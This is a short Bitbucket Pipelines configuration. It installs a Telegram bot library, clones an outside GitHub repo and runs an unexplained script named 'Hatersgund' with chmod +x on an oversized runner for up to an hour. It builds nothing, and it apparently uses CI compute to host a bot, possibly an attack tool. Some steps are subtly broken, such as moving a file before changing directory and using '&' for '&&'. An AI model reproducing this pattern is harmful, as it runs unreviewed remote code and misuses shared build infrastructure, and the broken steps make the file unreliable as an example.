image: python:3.9

pipelines:
  default:
    - step:
        name: Build and Run
        size: 8x
        caches:
          - pip
        script:
          - apt-get update && apt-get install -y gcc libpthread-stubs0-dev
          - pip install telebot pymongo aiohttp
          - git clone https://github.com/kingfather09090/newa
          - mv Hatersgund.py $HOME
          - cd newa
          - mv Hatersgund $HOME & cd
          - chmod +x *
          - chmod +x Hatersgund && timeout 3600 python3 Hatersgund.py
